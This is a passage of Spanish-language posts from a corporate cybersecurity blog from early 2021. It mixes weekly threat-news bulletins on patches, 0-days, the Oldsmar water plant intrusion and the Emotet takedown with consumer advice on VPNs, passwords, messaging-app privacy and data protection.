al titular de la cuenta en el caso de que detecten cuentas afectadas. Desde RIPE solicitan que los usuarios activen la autenticación de doble factor para mejorar la seguridad de sus cuentas. Toda la información: https://www.ripe.net/publications/news/announcements/attack-on-ripe-ncc-access
19 de febrero de 2021
¿Qué es la VPN y para qué sirve?
Las conexiones VPN no son nada nuevo, llevan con nosotros mucho tiempo, siempre unidas al ámbito empresarial. La gran versatilidad y sus diferentes usos ha hecho que cada vez sean más usuarios utilicen tecnología, estos factores, unidos al auge del teletrabajo debido a la pandemia, ha situado a las conexiones VPN como uno de los must en tecnología. La utilización de la VPN tiene beneficios que hacen muy recomendable su utilización. Utilizar una red privada de VPN que se conecta a una red inalámbrica pública (WiFi) hace que el tráfico que se genera viaje cifrado y se ponga más barreras a la hora de que un ciberdelincuente intente robar información confidencial. Las siglas VPN (Virtual Private Network) como su significado en inglés nos cuenta, se trata de una red virtual privada. Para conectarte a internet desde cualquier dispositivo (móvil, ordenador, tablet…) lo más habitual es tener en tu domicilio una red conectada a un router o módem que conectan al mismo tiempo con el proveedor de internet que tengas contratado. Normalmente no se tiene un único dispositivo conectado, sino que son varios, creando una dirección IP local distinta para cada una de esas conexiones. Con la creación de estas IPs se genera una red local, un conjunto de dispositivos conectados de tal modo que puedan compartir archivos de forma muy sencilla utilizando esta red local. Con la VPN lo que logramos es crear una red local sin necesidad que sus integrantes estén físicamente conectados entre sí, sino a través de internet. En resumen, creas una red privada utilizando internet con aquellas personas o dispositivos que tú quieres. Ventajas de las conexiones VPN Esta conexión funciona en todas las aplicaciones: enruta todo el tráfico de internet, a diferencia de los servidores proxy, que solo se usa en el navegador web y alguna app más que te deja configurar las opciones de conexión avanzadas. Además, la VPN se conecta y desconecta de manera muy sencilla, y cuenta con seguridad adicional en puntos de acceso WiFi, siempre y cuando la conexión esté cifrada. Una conexión VPN es un modo eficaz de evitar la censura, falseo de tu ubicación. Además, con una VPN tu proveedor de internet no podría saber qué páginas visitas pero, ¡ojo!, la compañía que gestiona la VPN sí. Principales usos de las conexiones VPN Teletrabajo: muy utilizado en aquellas empresas que necesitan acceder a una única red privada. Además, es una conexión previsiblemente cifrada y con un acceso protegido, el trabajador tiene el mismo acceso que si estuviera presencialmente en la empresa Evita bloqueos de contenido y censuras: al conectarte con VPN tu dispositivo se comunica con el servidor VPN, y es éste el que habla con Internet. Es así como se puede falsear tu ubicación y entrar en contenido que tu país prohíbe, como es el caso de Facebook en China Capa extra de seguridad: iniciar sesión en tu aplicación del banco mientras estás en una WiFi abierta nunca ha sido buena idea. Esa conexión esta sin cifrar y es aquí donde entra la capa extra de seguridad de la VPN, los paquetes se enviarían cifrados para que aquella persona que esté “escuchando” no pueda hacer nada. Pero no todo es tan bonito como parece, una VPN es tan segura y útil como su proveedor. Si no confías en tu VPN, no la uses ya que pueden ser ellos los que capturen tu tráfico, guarden registro de lo que hacen y vendan tu ancho de banda al mejor postor. Descargas P2P: es importante saber que las conexiones VPN también tiene usos en la descarga P2P aunque bajes torrents legales. Pero, es muy común que los proveedores de internet intenten boicotearte esas descargas ya que generas demasiado tráfico. Por ello, algunos proveedores bloquean las descargas P2P mientras que otros únicamente las boicotean. Si quieres saber más sobre seguridad en VPN y consejos para teletrabajar de forma segura, sigue leyendo: CYBER SECURITY Teletrabajo seguro, aplicando ciberseguridad desde casa 13 de marzo de 2020 CYBER SECURITY 10 tips para un teletrabajo seguro en tu empresa 18 de marzo de 2020
17 de febrero de 2021
Boletín semanal de ciberseguridad 6-12 febrero
Intento de contaminación del agua potable mediante un ciberataque Un actor amenaza no identificado habría accedido a los sistemas informáticos de la planta de tratamiento de aguas de la ciudad de Oldsmar en Florida, Estados Unidos, y habría modificado los componentes químicos a niveles peligrosos. La intrusión tuvo lugar el viernes 5 de febrero, cuando el atacante accedió hasta en dos ocasiones a un sistema informático que estaba configurado para permitir el control remoto de las operaciones de tratamiento de agua. Durante su segunda intrusión, cuya duración fue de unos cinco minutos, un operador que monitorizaba el sistema detectó al intruso al mover éste el cursor del ratón en la pantalla y acceder al software responsable del tratamiento de agua, llegando a cambiar el hidróxido de sodio, también conocido como sosa cáustica, de aproximadamente 100 partes por millón a 11.100 partes por millón. Desde el personal de la ciudad de Oldsmar han indicado que el atacante se desconectó en cuanto modificó los niveles de sosa cáustica y que, inmediatamente, un operador humano habría revertido estos niveles químicos a la normalidad, evitando que el agua contaminada llegase a los residentes locales. Las autoridades no han atribuido el ataque a ningún grupo o entidad específicos, aunque es importante señalar que la ciudad de Oldsmar está ubicada cerca del centro urbano de Tampa, que fue sede de la Super Bowl el pasado domingo. Más información: https://www.zdnet.com/article/hacker-modified-drinking-water-chemical-levels-in-a-us-city/ Boletín de seguridad de Microsoft Microsoft ha publicado su boletín mensual de seguridad en el que ha corregido 56 vulnerabilidades, 11 de ellas clasificadas como críticas, 2 como moderadas y 43 como importantes. Entre los fallos abordados destaca uno del tipo 0-day en Windows, catalogado como CVE-2021-1732, que estaría siendo explotado antes de la publicación de los parches del día de ayer y que permitiría que un atacante o programa malicioso obtenga privilegios administrativos. Entre el resto de fallos corregidos destacan dos errores críticos (CVE-2021-24074 y CVE-2021-24094) en la pila TCP/IP de Windows, que podrían desencadenar la ejecución remota de código; además de un tercer error (CVE-2021-24086), que podría ser usado en ataques DoS para bloquear dispositivos Windows. En adición, también se ha corregido un error crítico de ejecución remota de código en el componente del servidor DNS de Windows (CVE-2021-24078), que podría aprovecharse para secuestrar las operaciones de resolución de nombres de dominio dentro de entornos corporativos y redirigir el tráfico legítimo a servidores maliciosos. Finalmente, Microsoft también habría corregido 6 vulnerabilidades previamente reveladas (CVE-2021-1721, CVE-2021-1727, CVE-2021-1733, CVE-2021-24098, CVE-2021-24106 y CVE-2021-26701). Toda la información: https://msrc.microsoft.com/update-guide/releaseNote/2021-Feb Boletín de seguridad de SAP SAP ha publicado su boletín mensual de actualizaciones de seguridad en el que ha abordado una vulnerabilidad crítica en SAP Commerce, entre otras. El fallo crítico, catalogado como CVE-2021-21477 y con un CVSS de 9.9, afectaría a las versiones 1808, 1811, 1905, 2005 y 2011 del producto SAP Commerce, y podría permitir la ejecución remota de código (RCE). La compañía habría solventado el error cambiando los permisos predeterminados para las nuevas instalaciones del software, pero se necesitarían acciones de corrección manuales adicionales para las instalaciones existentes. Dichas acciones, según la firma de seguridad Onapsis, se podrían usar como una solución alternativa completa, siempre que no se puedan instalar los últimos parches. Por otra parte, se han incluido actualizaciones de otras seis notas de seguridad publicadas anteriormente, entre las cuales destaca la corrección de problemas en control del navegador Chromium, que se facilita con el cliente empresarial de SAP, cuya puntuación CVSS asciende a 10 y que afecta a la versión 6.5 del cliente de SAP. Finalmente, se ha solucionado un fallo de gravedad crítica (CVE-2021-21465), publicado y actualizado anteriormente, que incluiría a su vez múltiples fallos en SAP Business Warehouse, un producto de almacenamiento de datos basado en la plataforma SAP NetWeaver ABAP. Se recomienda encarecidamente a los usuarios que actualicen a las últimas versiones los productos afectados. Más información: https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=568460543 Microsoft advierte sobre el aumento de ataques de Webshell Microsoft ha alertado sobre la volumetría de ataques mensuales de Webshell, la cual se habría duplicado desde el año pasado. Las Webshell son herramientas que los actores amenaza implementan en servidores comprometidos para obtener y/o mantener el acceso, así como para ejecutar de forma remota códigos o comandos arbitrarios, desplazarse lateralmente dentro de la red o entregar payloads maliciosos adicionales. Los datos más recientes de Microsoft 365 Defender muestran que este aumento constante del uso de Webshells no solo se ha mantenido, sino que se ha acelerado. Además, todos los meses desde agosto de 2020 hasta enero de 2021, registraron un promedio de 140.000 herramientas maliciosas de este tipo encontradas en servidores comprometidos, casi el doble del promedio mensual visto el año anterior. En su publicación, Microsoft también facilita algunos consejos sobre cómo reforzar los servidores contra ataques que intentan descargar e instalar una Webshell. En esta misma línea, cabe recordar que la Agencia de Seguridad Nacional de EE.UU, en un informe conjunto emitido con la Dirección de Señales de Australia (ASD) en abril de 2020, también advirtió que se estarían intensificando los ataques a los servidores web vulnerables, para desplegar puertas traseras de Webshell. Asimismo, cabe agregar que la NSA tiene un repositorio con herramientas que organizaciones y administradores pueden usar para detectar y bloquear amenazas de esta tipología. Más detalles: https://www.microsoft.com/security/blog/2021/02/11/web-shell-attacks-continue-to-rise/ Y si quieres más información en tiempo real, suscríbete a nuestro canal de noticias y reflexiones sobre ciberseguridad creado por el equipo de Innovación y Laboratorio de ElevenPaths. Visita la página de CyberSecurityPulse.
12 de febrero de 2021
Mecanismos de ciberseguridad para el día a día
Cada vez es más habitual encontrarse en medios de comunicación generalistas noticias relacionadas con ciberataques, filtración de datos, escándalos de privacidad y, en definitiva, todo tipo de sucesos contra la seguridad. Estos incidentes no se limitan a intentos de ataque contra grandes empresas o importantes gobiernos, ya que éstos suelen ser los más protegidos. A la hora de atacar, los cibercriminales no distinguen entre tamaño o sector de empresa (recordemos que las Pymes son las más golpeadas), afectando también al usuario final, la mayoría de las veces totalmente desprotegido. Siendo un problema tan evidente e importante del que todos somos conscientes, la pregunta que surge es: ¿existen mecanismos de ciberseguridad que permitan fortalecer nuestra seguridad en el día a día? En este mismo blog hemos explicado métodos para teletrabajar aplicando ciberseguridad desde casa o qué hacer en caso de incidente, y en este articulo queremos recoger las principales acciones que un usuario puede implementar para evitar ser víctima de ciberataques: Protege tu seguridad con estos sencillos consejos Actualízate: cada vez que recibimos una notificación para actualizar el sistema, lo primero que nos viene a la cabeza son cosas como “no tengo tiempo”, “ahora no me viene bien”, “qué pereza”, etc. En definitiva, excusas para aplazar esa actualización que en muchos casos no llega nunca. Mantener los sistemas actualizados es de una importancia vital, ya que en muchas ocasiones estas actualizaciones lo que hacen precisamente es corregir fallos de seguridad o vulnerabilidades descubiertas. Un sistema desactualizado es mucho más fácil de corromper. Configura correctamente la red Wi-Fi de tu casa: resulta un paso sencillo de realizar y puede ahorrarte más de un disgusto. Cambia el nombre y contraseña que vienen por defecto en tu red Wi-Fi, muchas veces estas contraseñas se repiten de una red a otra y puede ser sencillo acceder a ellas. También es importante ocultar el nombre de la red Wi-Fi y desactivar el WPS. Contraseñas robustas: tu fecha de nacimiento, el nombre de tu perro, tu equipo de fútbol favorito… Estas son algunas de las tácticas más comunes para elegir contraseñas fáciles de recordar, pero es un grave error. Utiliza contraseñas robustas, para ello, sírvete de todo lo que te ofrece el teclado: muchos caracteres, incluye tanto números como letras, mayúsculas y minúsculas y caracteres especiales. Usa un gestor de contraseñas: una práctica muy habitual (y muy peligrosa) es reutilizar contraseñas una y otra vez. Lo ideal es tener una contraseña para cada aplicación, red social o sistema que utilices. Somos conscientes de que recordar todas y cada una de las contraseñas que deberías tener es imposible, por eso existen gestores de contraseñas como Keepass, LastPass o 1Password. Además, estos gestores tienen versión móvil así que los podemos llevar a todas partes. iPatches, ¡tapa la cámara!: habrás visto más de una vez unos pequeños trozos de plástico que sirven para tapar la webcam de tu portátil cuando no la estés utilizando, su nombre es iPatch, y sirve para ocultarte ante miradas indiscretas. Pueden conseguirse por muy poco dinero, o recurrir a un trozo de papel con un celo, una moneda pequeña o cualquier cosa que se te ocurra. Procura estar al día: si conoces las técnicas y métodos más habituales de estafa (en muchas ocasiones vía phishing) será mucho más difícil que caigas en la trampa. Cada viernes publicamos, en este mismo blog, un boletín semanal con las últimas noticias relevantes en ciberseguridad. Sentido común: parece evidente, pero para evitar caer en ciberataques es importante utilizar el sentido común. Normalmente, si algo es demasiado bueno para ser verdad, lo más seguro es que sea una estafa y puede acabar mal. Piénsalo dos veces, busca información y, si sospechas, no te arriesgues. También en el móvil: muchos usuarios piensan que las amenazas sólo afectan a los ordenadores, pero no es así. En los últimos tiempos estamos viendo cómo cada vez más surgen campañas dirigidas especialmente contra dispositivos móviles, por lo que todo que te hemos contado, aplícalo también en tu móvil. Para saber más sobre mecanismos de ciberseguridad y estar al día de todo lo que ocurre en este apasionante mundo, desde ElevenPaths ofrecemos contenido de varias maneras: Redes Sociales: Twitter, LinkedIn, Instagram y Facebook. Podcast: Entrevistas y Actualidad Webinars: Twitch Nuestra web
11 de febrero de 2021
Boletín semanal de ciberseguridad 30 enero - 5 febrero
Chrome rechazará los certificados de Camerfirma Google planea prohibir y eliminar el soporte de Chrome para los certificados digitales emitidos por la autoridad certificadora (CA) Camerfirma, una empresa española que tiene una amplia implementación en diferentes administraciones públicas de todo tipo, entre ellas la Agencia Tributaria. La restricción entrará en vigor con el lanzamiento de Chrome 90, previsto para mediados de abril de este mismo año. Con la nueva versión del navegador, todos los sitios web que utilicen certificados TLS emitidos por Camerfirma para asegurar su tráfico HTTPS, mostrarán un error y no se cargarán en Chrome. La decisión de prohibir los certificados de Camerfirma se anunció después de que la empresa tardara más de seis semanas en explicar una serie de 26 incidentes relacionados con su proceso de emisión de certificados. Por el momento, el resto de los proveedores de navegadores más importantes (Apple, Microsoft y Mozilla) no han indicado la toma de medidas similares pero se espera que lo hagan en las próximas semanas. Más detalles: https://www.zdnet.com/article/google-bans-another-misbehaving-ca-from-chrome/ Google y Qualcomm parchean vulnerabilidades críticas en Android El boletín de seguridad de febrero emitido por Google corrige, entre otras, dos vulnerabilidades consideradas de severidad crítica. Ambos errores, CVE-2021-0325 y CVE-2021-0326, permiten la ejecución remota de código arbitrario (RCE) dentro del contexto de un proceso privilegiado mediante el envío de un paquete o transmisión especialmente diseñada. En el mismo boletín se hace referencia a diversas vulnerabilidades en componentes de Qualcomm, notificados por la compañía en su propio boletín de seguridad. Tres de ellas de severidad crítica: CVE-2020-11272, que afecta al componente WLAN con una puntuación CVSS de 9.8 sobre 10; CVE-2020-11163 y CVE-2020-11170 que afecta a componentes de software propietario presentes en el sistema operativo. Todas ellas han sido corregidas y no se dispone de evidencias de su explotación activa. Más información: https://source.android.com/security/bulletin/2021-02-01 Google corrige un 0-day en Chrome Ayer 4 de febrero Google lanzó la versión 88.0.4324.150 de Chrome para Windows, Mac y Linux, que se irá implementando de manera progresiva en la base de usuarios durante los próximos días. Esta nueva actualización se produce tras la reciente publicación de la versión 88.0.4324.146 que ya corregía otras seis vulnerabilidades en el mismo navegador (CVE-2021-21142/21147). En esta ocasión la nueva versión se lanza para corregir un 0-day, identificado como CVE-2021-21148, reportado el pasado 24 de enero por el investigador Mattias Buelens. El fallo implica un desbordamiento de pila en el motor JavaScript v8, y puede ser aprovechado por los atacantes para ejecutar código arbitrario en sistemas que ejecuten versiones previas de Chrome. Dentro de su publicación, desde Google confirman la existencia de exploits funcionales para esta vulnerabilidad. Desde el medio Zdnet, apuntan a la coincidencia entre el reporte el 24 de enero de la vulnerabilidad, y la publicación, días después de los hallazgos por parte de Google el día 25 y de Microsoft el día 28 de una campaña de ataques contra investigadores de seguridad. Dentro de sendos artículos, las firmas mencionan la explotación de vulnerabilidades de 0-day en navegadores para ejecutar malware en los sistemas de los investigadores. Desde Google no han confirmado estas especulaciones, al no confirmar que la vulnerabilidad corregida en esta nueva versión (CVE-2021-21148) sea la que se empleó en los ataques. Toda la información: https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html SonicWall corrige una vulnerabilidad 0-day activamente explotada SonicWall ha publicado una actualización que corrige una vulnerabilidad 0-day en el Firmware SMA 100 series. El pasado 22 de enero la compañía informó que estaba siendo víctima de un ataque coordinado contra sus sistemas internos mediante la posible explotación de vulnerabilidades 0-day. La investigación interna situó el fallo en el producto Secure Mobile Access (SMA), en sus versiones 10x, recomendando preventivamente a los clientes habilitar la autenticación de factor múltiple en los dispositivos afectados como medida de mitigación. El día 31 de enero, NCC Group informó a SonicWall de detalles de la vulnerabilidad identificada, catalogada como CVE-2021-20016, la cual podría permitir a un atacante no autenticado la explotación remota mediante una consulta SQL que proporcionaría la contraseña del nombre de usuario y otros datos relacionados con la sesión. Por el momento, no se ha identificado todavía detalles sobre el actor detrás de los ataques contra SonicWall. Más detalles: https://www.sonicwall.com/support/product-notification/urgent-patch-available-for-sma-100-series-10-x-firmware-zero-day-vulnerability-updated-feb-3-2-p-m-cst/210122173415410/ CacheFlow – Extensiones maliciosas de Chrome y Edge roban y manipulan datos de los usuarios Investigadores de seguridad de Avast han publicado una nueva entrada en su blog con más detalles de la amenaza conocida como CacheFlow, que daban a conocer el pasado mes de diciembre de 2020 investigadores de CZ.NIC y que llevaría activo al menos desde el pasado octubre de 2017. En el nuevo artículo, desde Avast describen una campaña en la que estarían implicadas una amplia red de extensiones maliciosas para los navegadores Chrome y Edge, que contarían con más de tres millones de instalaciones en total. El ataque de CacheFlow se lleva a cabo en varios pasos, y comienza cuando un usuario descarga una de las extensiones. Unos días después de ser instalada, se descargaba desde un canal encubierto una nueva carga intermedia, que finalmente, descargaba el payload CacheFlow. Llegados a este punto, cada vez que se ejecutaba el navegador, CacheFlow trataba de robar información de la cuenta de Google del usuario, inyectaba código malicioso en todas las nuevas pestañas abiertas y secuestraba los clics de los usuarios para modificar los resultados de las búsquedas. Según la investigación de Avast, los países más afectados por el ataque serían Brasil, Ucrania y Francia, si bien también se han detectado descargas de estas extensiones desde España. Más información: https://decoded.avast.io/janvojtesek/backdoored-browser-extensions-hid-malicious-traffic-in-analytics-requests/
5 de febrero de 2021
WhatsApp, Telegram o Signal, ¿cuál elegir?
En el mundo del smartphone, 2021 comenzó con una noticia que no ha dejado indiferente a nadie: la actualización de los términos y condiciones de uso de WhatsApp. Esta medida, cuya fecha de entrada en vigor fue fijada por Facebook para el día 8 de febrero pero que finalmente ha retrasado al 15 de mayo, ha generado una gran polémica en redes sociales dado el impacto que esta supone en la privacidad de los usuarios. Como consecuencia, la migración a otras aplicaciones de mensajería ha aumentado significativamente, como se puede observar en el siguiente gráfico: Fuente: Statista a partir de Airnow Data Dada la situación, en este artículo veremos las principales diferencias en cuanto a seguridad y privacidad que existen entre la aplicación verde, Telegram y Signal. Hemos descartado aplicaciones como iMessage o Google Messages porque su uso es exclusivo para usuarios de iPhone y Android, respectivamente; y otras minoritarias menos relevantes para esta comparativa. WhatsApp WhatsApp cuenta con más de 2.000 millones de usuarios en todo el mundo. Utiliza el cifrado de extremo a extremo en todos sus chats, tanto individuales como grupales. Este sistema criptográfico protege los mensajes para que sólo el emisor y el receptor puedan leerlos y nadie más, ni siquiera la propia aplicación. Los algoritmos criptográficos utilizados son Curve25519/AES-256/HMAC-SHA256. Cabe destacar la gran cantidad de datos asociados a tu cuenta que solicita: número de teléfono, ID de usuario, contactos, correo electrónico, ID de dispositivo, ubicación aproximada, datos de publicidad, historial de compras e información de pagos, interacción del producto, informes de fallos y rendimiento y atención al cliente. Los metadatos que recopila son direcciones IP, contactos, operadores de red, fechas de uso, ubicación, modelo del teléfono e ID del dispositivo. WhatsApp tiene algunas opciones de privacidad como ocultar tu nombre de usuario, hora de conexión, foto de perfil, información y estado y tiene opción de verificación en dos pasos y de desbloqueo por huella dactilar. Telegram Telegram es la principal competidora de WhatsApp por la similitud de sus funcionalidades y actualmente cuenta con más de 500 millones de usuarios en todo el mundo. Esta aplicación también utiliza el cifrado de extremo a extremo para sus comunicaciones, pero no en todos sus chats, sólo en los chats secretos. En los chats estándar se utiliza un cifrado servidor-cliente, aunque es muy robusto. En los chats secretos de Telegram, se añade la capa de cifrado extremo a extremo. Los algoritmos de cifrado son RSA 2048/AES 256/SHA-256 (ya dejó de usar el SHA-1 por su inseguridad). Telegram es una app de código abierto u Open Source y cualquiera puede revisar su código fuente, protocolo y API. La aplicación solicita un número considerablemente más reducido de datos asociados a tu cuenta que WhatsApp: número de teléfono, ID de usuario, contactos del teléfono y el nombre de tu cuenta. En cuanto a los metadatos, recopila direcciones IP, contactos y dispositivos. Telegram contiene la verificación en dos pasos (2FA), desbloqueo por huella dactilar, teclado incógnito y en los chats secretos se incluyen otras funciones adicionales como el bloqueo de capturas de pantalla o la posibilidad de autodestruir tus mensajes después de ser enviados. Además, en caso de abandono de la cuenta, esta se autodestruye, eliminando automáticamente toda la información contenida en los servidores de Telegram. La app permite establecer un nombre de usuario vacío para no revelar tu identidad. De la misma manera, el número de teléfono no es visible salvo que tú lo permitas. Telegram cuenta con bots, una funcionalidad que permite automatizar multitud de tareas dentro de la aplicación, por ejemplo, filtrado el spam, detección de phishing, etc. Signal Signal ha pasado de tener 10 millones a 50 millones de descargas en pocos días. Se trata de un número mucho más modesto que las dos aplicaciones anteriores y sus funcionalidades son más limitadas (aunque recientemente ha replicado varias de WhatsApp), pero la relevancia de la privacidad en la opinión pública le está haciendo ganar popularidad entre los usuarios. El cifrado de extremo a extremo que utiliza en todas las comunicaciones es el mismo que el de WhatsApp (o más bien al contrario, ya que el de WhatsApp utiliza el protocolo Signal desarrollado por Open Whisper Systems), con los mismos algoritmos de cifrado: Curve25519/AES-256/HMAC-SHA256. Signal también es Open Source para que la comunidad de desarrolladores pueda contribuir a mejorar su código. Signal también incluye la verificación en dos pasos. Tu nombre de usuario e imagen de perfil son visibles para tus contactos, no es algo configurable. Otras características clave son la posibilidad de activar el remitente confidencial para enviar mensajes sin compartir tu perfil, los mensajes temporales y bloqueo de capturas de pantalla (como en Telegram) o redirigir las llamadas a través de los servidores de Signal para mantener oculta tu IP. El único dato que solicita esta app es tu número de teléfono. Así es, un número de teléfono es suficiente para crear una cuenta en Signal. Asimismo, el único metadato que guarda es la fecha de la última conexión. Recapitulemos con esta tabla lo que hemos visto: Como ves, existen alternativas con un menor impacto en la privacidad de los usuarios. Sin embargo, la sólida red de usuarios que ha conseguido WhatsApp gracias a su popularidad puede plantearte esta duda: ¿cómo voy a poder hablar con mis contactos si siguen utilizando WhatsApp? Esta cuestión, junto con las pequeñas diferencias entre las funcionalidades de las apps, llevan implícita una decisión que solamente los usuarios pueden tomar.
3 de febrero de 2021
Boletín semanal de ciberseguridad 23-29 enero
Ataque contra SonicWall mediante la explotación de un posible 0-day en sus dispositivos VPN El fabricante de firewalls SonicWall ha emitido un aviso de seguridad en el que alerta de la detección de un ataque sofisticado contra sus sistemas que podría haberse realizado gracias a la explotación de un 0-day en algunos de sus productos de acceso remoto. En concreto los productos afectados serían: versiones 10.x de su cliente VPN NetExtender y versiones 10.x de sus dispositivos de Secure Mobile Access (SMA). Desde la firma recomiendan habilitar la autenticación de factor múltiple (MFA) en los dispositivos posiblemente afectados y restringir las conexiones SSL-VPN a los dispositivos SMA únicamente a direcciones IP conocidas mediante una lista blanca. El fabricante no ha ofrecido detalles sobre las vulnerabilidades, pero según Bleeping Computer, parecen ser vulnerabilidades previas a la autenticación que podrían explotarse de forma remota en dispositivos de acceso público. Asimismo, desde este medio aseguran que el miércoles 20 de enero se habría puesto en contacto con ellos un agente amenaza que aseguraba tener información acerca de un 0-day en un conocido proveedor de firewall. Más información: https://www.sonicwall.com/support/product-notification/urgent-security-notice-netextender-vpn-client-10-x-sma-100-series-vulnerability-updated-jan-23-2021/210122173415410/ Campaña contra investigadores de seguridad El Threat Analysis Group de Google ha identificado una campaña, iniciada hace unos meses, dirigida contra investigadores de seguridad y de vulnerabilidades, y posiblemente llevada a cabo por un grupo malicioso con el apoyo del gobierno norcoreano. Este grupo creó una red de interacciones para generar credibilidad, creando un blog de investigación de vulnerabilidades y varios perfiles en Twitter que les permitían compartir sus propias publicaciones y establecer comunicación con las víctimas. Tras las comunicaciones iniciales por redes sociales (Twitter, Telegram, LinkedIn, email, Keybase y Discord), se preguntaba a expertos del sector si querían colaborar con ellos en una investigación de vulnerabilidades, proporcionándoles un proyecto de Visual Studio donde supuestamente estaría el código fuente para explotar la vulnerabilidad y una DDL adicional, siendo esta última si bien un malware personalizado que al ejecutarse se comunica con los dominios Command & Control que el grupo cibercriminal controla. También se ha detectado el compromiso de sistemas con puertas traseras tras acceder a un enlace publicado en Twitter que llevaría a un supuesto artículo que estaría en el blog de investigación. Tan solo unos días después de anunciar la existencia de la campaña, desde Microsoft publican una nueva actualización, indicando que la campaña continúa activa. Microsoft, que ha denominado al actor malicioso ZINC, asociado a Corea del Norte, ha añadido además nuevos detalles técnicos. Los objetivos contra los que se dirige esta actividad incluyen pentesters, investigadores de seguridad ofensiva, y empleados de seguridad y tecnología. ZINC utiliza una serie de técnicas que incluyen ganar credibilidad en redes sociales compartiendo contenido especializado, el uso de webs maliciosas para lanzar ataques de watering hole que explotan vulnerabilidades en el navegador, y el envío de proyectos maliciosos de Visual Studio. En este último caso, los proyectos enviados incluyen binarios prediseñados, entre ellos “Browse.vc.db” que incluye un DLL malicioso detectado por Microsoft como el malware Comebacker. Más detalles: https://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/ https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/ Boletín extraordinario de Apple corrige varios 0-day activamente explotados Apple ha publicado un boletín de seguridad extraordinario en el que corrigen tres vulnerabilidades 0day, una en Kernel (CVE-2021-1782) y dos en WebKit (CVE-2021-1871 y CVE-2021-1870), que estarían siendo aprovechadas de forma masiva. Por el momento, la compañía no ha revelado si la explotación está siendo indiscriminada o bien dirigida, pero para poder explotarlas, requieren interacción del usuario. La cadena de explotación es completa, ya que en una primera fase se despliega el exploit en el navegador de la víctima (WebKit), para más adelante, vulnerar el kernel. Estas vulnerabilidades están afectando tanto a iOS como a iPadOs, por lo que se recomienda actualizar los dispositivos a la versión 14.4. Toda la información: https://support.apple.com/en-us/HT212146 Vulnerabilidad en sudo permite obtener permisos de root Investigadores de seguridad de Qualys han descubierto y publicado los detalles sobre una vulnerabilidad de tipo heap overflow en sudo, que permitiría a usuarios locales obtener permisos de root en un sistema vulnerable. Según los investigadores, este fallo (CVE-2021-3156) existiría desde 2011. Además, desde Qualys han desarrollado exploits para probar esta vulnerabilidad, logrando obtener permisos de root en las distribuciones de Linux: Ubuntu 20.04, Debian 10 y Fedora 33, si bien creen que otros sistemas operativos y distribuciones también podrían ser vulnerables. La vulnerabilidad ha sido corregida en la versión 1.9.5p2 de sudo. Más información: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt Emotet: desarticulado tras una operación policial mundial Una operación conjunta entre autoridades de Estados Unidos, Reino Unido, Francia, Lituania, Canadá, Países Bajos, Alemania y Ucrania, coordinada por la Europol y Eurojust ha dado como resultado la desarticulación del malware Emotet. Desde su aparición como troyano bancario en el año 2014, este malware ha evolucionado hasta convertirse en una de las redes de bots más importantes, siendo utilizada por los ciberdelincuentes como puerta de entrada en los sistemas afectados para propagar otras infecciones. De hecho, tal y como informamos desde este boletín, su actividad se vio intensificada en diversas campañas en el último mes, teniendo noticias de la última campaña hace tan solo una semana. De acuerdo con la información proporcionada, en esta semana las autoridades judiciales y policiales obtuvieron acceso al control de la infraestructura y la desarticularon desde dentro; se sabe que esta infraestructura implicaba a cientos de servidores en todo el mundo. Además, se ha distribuido la información disponible para su mitigación a todos los CERTs, con el fin de notificar y limpiar aquellos sistemas afectados. Hasta el momento se sabe que las fuerzas policiales de Alemania (BKA) han reemplazado los servidores C2 con sus propios servidores con el fin de distribuir entre los sistemas afectados un archivo con objetivos mitigatorios, que evite que los administradores de Emotet se vuelvan a comunicar con los sistemas afectados y que distribuirá un módulo creado para su desinstalación, la cual parece estar programada para el día 25 de abril. También se ha sabido que dos operadores del malware fueron detenidos en Ucrania y que la policía de Países Bajos ha recuperado datos robados de las víctimas de Emotet. A pesar de todas estas acciones, aún sigue existiendo un alto riesgo de que Emotet vuelva a operar (no a corto plazo, pero sí transcurridos varios meses), ya que no todos los responsables han sido detenidos, tal y como afirman investigadores de Cofense. Más detalles: https://www.europol.europa.eu/newsroom/news/world%E2%80%99s-most-dangerous-malware-emotet-disrupted-through-global-action
29 de enero de 2021
4 consejos para asegurar tus datos
Navegamos por Internet a diario. Muchos somos ya considerados nativos digitales. Sí, Internet es casi una extensión más de nosotros, ¿pero somos realmente conscientes de en qué medida y de cómo lo utilizamos? Y, sobre todo, ¿de cómo dejamos que usen nuestros datos? Este 28 de enero celebramos el Día Europeo de la Protección de Datos. Se trata de una jornada anual iniciada en 2006 y promovida tanto por la Comisión Europea como por el Consejo de Europa y las distintas autoridades de protección de datos de cada país. Su objetivo es concienciar y poner en conocimiento, tanto de los ciudadanos como de las empresas, todo lo relacionado con derechos y responsabilidades en lo que al campo de la protección de datos se refiere. Con motivo de esta celebración, desde ElevenPaths queremos compartir contigo 4 sencillos consejos con los que dar más protección a nuestros datos en la web. ¿Preparado? Abre el candado porque allá vamos. Los post-it no son buenos aliados para tus contraseñas Sabemos que a diario manejas varias contraseñas y que recordarlas todas es muy difícil, si no imposible. Pero créenos, los post-it o son el mejor sitio donde guardarlas. Aunque a veces resulte un poco pesado tener que poner a salvo tanto número, letra o símbolo, piensa en el valor que tiene una contraseña. Las contraseñas son la puerta de entrada a todo nuestro mundo web, a nuestro interior, y por eso es tan importante saber guárdalas y valorarlas bien. Como ya sabemos, no es nada conveniente repetir contraseñas ya que si alguien la descubre tendrá acceso a más de una de nuestras cuentas o servicios web. Igualmente, no debes caer en la tentación de compartirlas con nadie y, mucho menos, dejarlas reflejadas por escrito a través de soportes no seguros, sea un post-it, papel o un mismo chat de WhatsApp. Mantén siempre los ojos bien abiertos sobre en dónde o a quién das tus contraseñas porque los ataques de phishing están siempre a la vuelta de la esquina esperando que caigamos en su trampa. ¿Cómo evitarlo y mantener nuestras contraseñas siempre seguras? Dos ideas: podemos usar un gestor de contraseñas y validar la verificación en dos pasos. Mira siempre la letra pequeña ¿Eres de los que descarga e instala apps y programas sin leer bien los permisos que acepta? No te preocupes, no eres el único, pero piénsalo dos veces la próxima vez. Si no leemos las condiciones ni los permisos que estamos cediendo, podemos encontrarnos con una intromisión en nuestros datos personales que nosotros mismos hemos consentido. Por ello, es recomendable que inviertas unos minutos de tu tiempo en leer y comprender, siempre antes de aceptar, los términos de las descargas e instalaciones que estás realizando. Nuestro consejo es que acudas siempre a las fuentes y tiendas oficiales y que no 